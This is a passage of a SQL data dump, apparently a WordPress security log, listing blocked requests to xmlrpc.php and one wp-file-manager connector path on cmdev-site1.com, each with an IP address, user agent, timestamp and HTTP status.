Firefox\\/45.0\"}','XoMuGL5djnUKF4bY3rWhAw8m',0,1681683068.3116,766,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','bkCvwFWZV4n9mrUcP5xzKBj8',0,1681683058.4789,1418,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','rdCDoYWFJum32tBEXZgpRsM9',0,1681683058.3613,1426,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','hM7FQrOWuj68ELDeCGRaqvln',0,1681683055.2635,683,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','kNPyGFERhJHuC3V1YD8jBzI7',0,1681683054.3876,792,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Nrz9HEgoWkZPMUcDdeasmbQ7',0,1681683048.9364,4551,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','J6esDMPciU4TO3K82CrumXyF',0,1681687196.4402,598,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','CRoJuah1UM9AVDrHj7G3mX5t',0,1681687192.1569,1557,'','POST',403,0,515,0,1,'',0),('185.98.5.202',3110208970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','7cqYbXuNEWnR4mFCQ5kiv8rL',0,1681686448.1255,562,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','GzdKDc6iYL3lPWnuofC1et2I',0,1681686446.8595,604,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','wfV9TmQKJRlFoGiU5rX34hqI',0,1681686444.1929,740,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','9HEFWS5IX2dPef0gZ64RsqJK',0,1681692118.1168,1785,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','2o9eXlcBSFNvV5mZI04Eztkp',0,1681692116.1568,4209,'','POST',403,0,515,0,1,'',0),('80.88.87.138',1347966858,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bus6hyg5UJ27xfPvQZzwK4tG',0,1681696125.8014,615,'','POST',403,0,515,0,1,'',0),('213.160.184.22',3584079894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','azRqsNKo2XOlbPm1Cck0xTdL',0,1681696120.0504,1398,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','pfYb4Drg0IoynJw9xakEVhdX',0,1681696116.1943,4684,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','cRZ456HTBlYK8eDfv9uMjtmU',0,1681694384.3017,284,'','GET',403,0,700,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','45fj9JUTGd81ogDYarqNICei',0,1681705027.9136,610,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','A3squOej4ETGKyXBoNfPhFwJ',0,1681705023.1236,577,'','POST',403,0,515,0,1,'',0),('213.159.7.167',3583969191,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','10s2EMjhBwStzy3b8nXAUgVp',0,1681705019.3720,586,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','zUaJwxYLejpNO5s2mC9vyKFI',0,1681705002.6186,612,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','Uu20B5pKMjRevDTxLcIaHCzn',0,1681705001.1299,647,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','qSyhwEDuAnHeQMiJO2ldUGbf',0,1681704996.1925,4008,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','IprGTP3DhLAZOHm0octRjMf1',0,1681704997.3871,1963,'','POST',403,0,515,0,1,'',0),('202.172.26.49',3400276529,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','aSFDP4NIi0ctCoGL6nlduRKf',0,1681713376.8834,827,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','zk6sM37OpSadT4bRtrmyhLui',0,1681713366.4133,694,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','oz35XUmujcSbAQ9tK2DTxCRL',0,1681713364.7594,787,'','POST',403,0,515,0,1,'',0),('216.194.166.253',3636635389,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','sS0UYbRtQqkKu6j14MCHLfzX',0,1681713364.0864,774,'','POST',403,0,515,0,1,'',0),('157.90.205.145',2639973777,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','CtjhgImrBbZ9cLS0Hea7RiQV',0,1681713359.2323,623,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','GdftnL4EeNaBYAxv1X3JjKo5',0,1681713354.6229,1404,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','S9JYDW0xZ7EhCX5Ir4wRG8jO',0,1681713352.8281,605,'','POST',403,0,515,0,1,'',0),('146.59.33.210',2453348818,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','OKuVGbSUw2WFgfBHIr798CcZ',0,1681713343.8537,2874,'','POST',403,0,515,0,1,'',0),('157.90.205.145',2639973777,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','VE6JH21CSY9Mrq0WKLZftBl3',0,1681713342.5329,3457,'','POST',403,0,515,0,1,'',0),('195.154.107.17',3281677073,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','aCzugn0mwZEAhGltdB6NVvkT',0,1681715657.5632,794,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','8LRJNi1op9dTMezjsuybV7OU',0,1681715656.9376,837,'','POST',403,0,515,0,1,'',0),('69.49.247.110',1160902510,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','9MawTmEAqS3eilBJNI6n5t0Y',0,1681715649.3709,587,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','whH1YqMpSZEoyzTvOk37QlfP',0,1681715643.1730,677,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','neE0CuboyOhvfBW1PL4cts9D',0,1681715640.0298,570,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','r98uKGQ1ECegkWblaq4Xw30R',0,1681715628.8191,600,'','POST',403,0,515,0,1,'',0),('88.214.28.5',1490426885,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CRwam07fV5TODzJGrNp8Etdg',0,1681715627.8014,632,'','POST',403,0,515,0,1,'',0),('213.152.161.240',3583549936,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6hskuPmqnYl7bvJU158oViB3',0,1681715462.7360,5340,'','POST',403,0,515,0,1,'',0),('194.31.87.110',3256833902,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ahDcj5G0M1gm8b9R4CQtTPLK',0,1681723529.4478,608,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','Z4rzfPpdqigCwcY2OE571JeH',0,1681723527.7798,577,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','sxAKUucC1qi27Fger6DMVBIR',0,1681723522.0820,574,'','POST',403,0,515,0,1,'',0),('194.195.112.30',3267588126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','3Uswifmk7FKp4ahN9GdQeOVI',0,1681723515.5486,564,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','3ENdPuptzY0xBLZqaRmlnbX1',0,1681723509.9567,596,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','hFe2McRjOGgv0y6IQmbWkxir',0,1681723506.0319,3580,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','ZrC9qWenEsdYvkAIctg7Paxy',0,1681723506.8479,2032,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','rBdMYIja29OGc8CQ5znfq6Jx',0,1681723088.2432,983,'','POST',403,0,515,0,1,'',0),('5.187.50.29',96154141,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','L3WFsUbvKZHEzSl4DrIdoxBO',0,1681723084.4087,3845,'','POST',403,0,515,0,1,'',0),('51.195.124.72',868449352,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','c174CLQ95PgKuF8RnByj02TA',0,1681723086.2791,1974,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','MRx4TK05nAiVPmCvgflN1rIE',0,1681725973.4662,586,'','POST',403,0,515,0,1,'',0),('82.196.8.42',1388578858,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','cmJjbswWiMIxFv2X7VhtEDNu',0,1681725976.1576,608,'','POST',403,0,515,0,1,'',0),('157.230.250.100',2649160292,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','RI4kp8uYzZThova2B7Gx90bf',0,1681725983.2900,635,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','PTVxMqz9C7ULfApctlErubSh',0,1681725969.8646,722,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','TW28AEiqZ7we5kzO1HBj6vru',0,1681725963.8886,521,'','POST',404,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','PwSXv3kVxtBTf2UmQOusqCGh',0,1681725962.6291,637,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','OC6IHedBDoTqjVblN9Xkw0LZ',0,1681725956.0904,1363,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','kpX7bWQeTtjYh6UqZOMKz1vA',0,1681725947.7794,3315,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','53GytVvserXMNQmdz8nCaF2Y',0,1681725955.9439,1396,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','vYgKCpGO15zVBEX9cqy2ikAh',0,1681730719.6206,590,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','6BEqsP1IvuT2eKSx9rwMNbzn',0,1681730714.9471,627,'','POST',403,0,515,0,1,'',0),('62.109.150.204',1047369420,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','olzK82DZPvFQ3NjpsB5L01dw',0,1681730714.1199,569,'','POST',403,0,515,0,1,'',0),('194.30.32.123',3256754299,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','CN6oF5ugKWpU7LzPVmE1rZ0x',0,1681730710.5097,588,'','POST',403,0,515,0,1,'',0),('78.153.200.194',1318701250,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','nCpvlqUcY7y98HWJINaXQb5o',0,1681730709.0898,574,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','hTuEbV1Dg2erFNPQYywiXGvk',0,1681730701.4815,4275,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','zHFkjhGms5tp1W4JEPNRDfUB',0,1681737467.0054,540,'','POST',403,0,515,0,1,'',0),('149.127.214.172',2508183212,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','y16lqUtNQSXsfbc74OYj83eV',0,1681737452.2951,598,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','3DdQ2qspgFCfv9Vj4n7NXMLl',0,1681737444.8911,592,'','POST',403,0,515,0,1,'',0),('202.172.26.49',3400276529,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','dIjrcDyLTh5XoZUCvE1AS6Ww',0,1681737439.8074,3208,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','sXIY5g9Gu0DjyLK4NCrvf7Jx',0,1681737440.4532,1910,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','e5Ua4l62rEugtTSsvdbcM7KX',0,1681740697.6421,978,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','sC2d4gZ1JIleMGhvUjV06Q3n',0,1681740705.8907,533,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','0LrWzxybOkjZSDQtGqdJwmnV',0,1681740686.7499,605,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','qgSVCub6EdINp3741anT5QMF',0,1681740683.5445,566,'','POST',403,0,515,0,1,'',0),('148.66.145.137',2487390601,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','JZFVRbeaUyK51nsdALj3lhSI',0,1681740674.8461,3796,'','POST',403,0,515,0,1,'',0),('199.85.208.215',3344290007,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','6ctF3YAXKovrGadl9hTkHySV',0,1681740674.5197,4066,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','d4eKAcUI5bFP8jvCQWs6JnBR',0,1681745219.4474,1644,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','Wpl8vZ9Goq2uwzjsQHim0Ebh',0,1681745217.5007,3778,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','2P9BZSyjfepgQoA35xswHDzM',0,1681750150.1561,2435,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','ywu1Cgh8UROBXvGK2H407D69',0,1681750045.3932,590,'','POST',403,0,515,0,1,'',0),('149.127.214.172',2508183212,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','a0PT2EsKVclDXbYi576vBfqz',0,1681750034.4728,590,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','IWgsoAq1ZRDm5EhpUxTuPzMy',0,1681750028.9541,545,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 